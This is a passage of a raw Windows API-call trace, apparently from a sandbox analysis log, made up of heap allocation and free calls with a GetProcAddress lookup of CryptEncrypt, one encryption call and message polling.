(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0240.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0240.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0240.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0240.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0240.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xccb) returned 0x3bf3460 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf3460 | out: hHeap=0x970000) returned 1 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0240.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0240.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0240.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0240.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0240.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0240.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0240.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0240.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0240.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51430, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0240.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0240.645] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0240.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.645] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xccb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xcd0) returned 1 [0240.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0240.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.646] CharLowerBuffW (in: lpsz="byte[3280]", cchLength=0xa | out: lpsz="byte[3280]") returned 0xa [0240.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0240.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0240.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0240.647] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0240.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0240.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0240.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0240.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0240.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0240.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xccb) returned 0x3bf4138 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf4138 | out: hHeap=0x970000) returned 1 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0240.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0240.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.654] RtlAllocateHeap 